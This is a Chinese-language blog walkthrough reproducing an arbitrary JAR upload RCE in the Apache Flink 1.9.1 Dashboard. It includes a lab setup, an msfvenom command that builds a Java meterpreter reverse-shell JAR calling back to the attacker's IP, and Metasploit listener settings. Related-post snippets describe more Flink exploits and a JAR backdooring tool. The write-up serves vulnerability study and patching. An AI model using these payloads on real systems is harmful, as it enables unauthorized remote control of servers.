Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

最新推荐文章于 2021-08-31 11:08:02 发布
最新推荐文章于 2021-08-31 11:08:02 发布
阅读量134 收藏
点赞数
文章标签: java flink maven hadoop zookeeper
原文链接:https://blog.51cto.com/14840650/2510209
版权

0x00简介

Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。

Apache Flink能用来做什么?

l 实时推荐系统

l 实时报表

l 实时数仓与ETL

l 复杂事件处理

l 实时欺诈与实时信用评估

l 大数据安全监测
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01漏洞介绍

***者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

至目前Apache Flink 1.9.1版本

0x03环境搭建

***机kali:192.168.10.147

受害机Ubuntu:192.168.10.176

测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载:

<a href="https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz">https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz</a>;

下载完成后使用解压

tar zxvf flink-1.9.1-bin-scala_2.11.tgz

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

进入bin目录运行./start-cluster.sh启动环境
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

环境搭建成功 目标站点

http://192.168.10.176:8081
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x04漏洞复现

1、使用kali生成jar后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

2、***机访问目标站点 并上传shell.jar

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

3、使用kali配置监听

use exploit/multi/handler

set payload java/shell/reverse_tcp

set RHOST 192.168.10.147

set LPORT 2020

run

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

4、点开刚刚上传的shell.jar,触发漏洞

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x05修复方式

更新官方补丁或更新最新版本

qq_38461475
关注
【学习笔记】Apache Flink任意Jar上传导致RCE
lx_lyt的博客
11-19 638
Apache Flink任意Jar上传导致RCE 一、简介 Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache flink允许上传任意jar从而导致远程代码执行。 二、影响范围 ...
Apache Flink任意JAR上传漏洞分析与修复指南
最新发布
weixin_43822401的博客
07-08 603
漏洞允许未经授权的用户上传JAR文件,这些JAR文件可以在Flink集群上执行,可能导致远程代码执行(RCE)。Apache Flink任意JAR上传漏洞是一个严重的安全问题,需要立即采取措施进行修复。通过本文提供的分析和修复指南,可以帮助管理员和开发人员保护他们的Flink集群不受此漏洞的影响。
Apache Flink RCE漏洞复现(任意 Jar 上传)
Li-D的博客
08-31 3578
漏洞描述 Apache Flink Dashboard 默认无需认证即可访问,攻击者可直接在Apache Flink Dashboard页面中上传任意jar,从而达到远程代码执行的目的。 影响版本 Apache Flink <= 1.9.1 环境搭建 操作系统: Windows10 操作环境: Apache flink 漏洞版本: Apache flink 1.9.1 搭建过程: (1)下载flink (https://archive.apache.org/dist/flink/flink-1.9.
Apache Flink任意Jar上传导致远程代码执行漏洞复现
Heytoo的博客
06-19 708
0x00 简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 0x01 Flink应用场景 优化电子商务的实时搜索结果:阿里巴巴的所有基础设施团队使用flink实时更新产品细节和库存信息,为用户提供更高的关联性。 针对数据分析团队提供实时流处理服务:flink通过flink-powered数据分析平台提供实时数
Apache Flink 任意 Jar 上传RCE 漏洞
m0_48520508的博客
12-03 304
0x00简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01漏洞概述 攻击者可直接在Apache Flink Dashboard页面中上传任意jar,从而达到远程代码执行的目的 0x
Apache Flink 任意Jar上传漏洞复现
潜心学安全的小白
11-15 1117
目录漏洞背景漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议参考链接 漏洞背景 近日,有研究员公开了Apache Flink未授权上传jar的安全风险,攻击者利用该隐患可在未经授权的情况下,上传含恶意代码的jar,从而控制目标服务器。 漏洞描述 Apache Flink是开源流处理框架,可用于对流数据进行分布式处理,在大数据领域中应用广泛。jar上传属于Flink的正常业务功能,但是Fli...
ajar:带有指定 .java 文件的自动后门 .jar 文件
06-25
文件 ajar.py -b <backdoor> -t <target> [-o <outfile>] 将 backdoor.java 注入 target.jar。 可能证明在中间人攻击中很有用。 这发生在: 将 target.jar 解压到 ./tmp/ 解析 Main-Class 值的清单 将 Main-Class 更改为后门 修改后门在自己的main()方法末尾调用原initial.class的main()方法 将修改后的 backdoor.java 编译为 ./tmp/backdoor.class 重新压缩 ./tmp/* 到 outfile.jar (默认是 backdoor.jar) 如果后门是一个持久性函数(例如侦听套接字的外壳程序),请确保将其分离到它自己的线程中,否则主应用程序将永远不会执行。 工具假定 javac 在您的路径中,您可以
Apache Flink RCE 漏洞复现
Yanug
05-07 3169
0x00 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 0x01 漏洞概述 攻击者可直接在Apache Flink Dashboard页面中上传任意jar,从而达到远程代码执行的目的。 0x02 影响版本 至目前最新版本Apache Flink 1...
Apache Flink任意jar上传漏洞复现
来到了学渣的博客
07-18 536
这个漏洞也是我在参加攻防演练的时候碰到的,这个Apache Flink文档搭建好后一般都会在8081端口映射出来。 漏洞环境 主要的影响版本<= 1.9.1 攻击机ip 192.168.10.144 漏洞环境ip 192.168.10.158 Apache Flink的下载地址 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz 安装解压好后,来到bin目录下启动文件然后
漏洞复现Apache Flink任意Jar上传导致远程代码执行
热门推荐
Summer's blog
05-13 1万+
记一次Apache Flink任意Jar上传导致远程代码执行复现漏洞过程。 致力于小白都能看懂的漏洞复现过程!
Apache Flink Jar上传漏洞复现(详细)
偷一个月亮
11-22 1281
搭建环境 wget http://mirror.bit.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz tar -zxf flink-1.9.1-bin-scala_2.11.tgz ./start-cluster.sh 记得切换目录,.sh在bin文件夹 出现了一点小插曲: Please specif...
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 1848
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
CVE-2020-13933: Apache Shiro 权限绕过漏洞分析
爱国小白帽
09-22 5868
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-092201 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-22 0x01 漏洞简述 2020年08月18日, 360CERT监测发现 Apache Shiro 发布了 Apahce Shiro 权限绕过 的风险通告,该漏洞编号为 CVE-2020-13933,漏洞等级:高危,漏洞评分:8.0。 Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值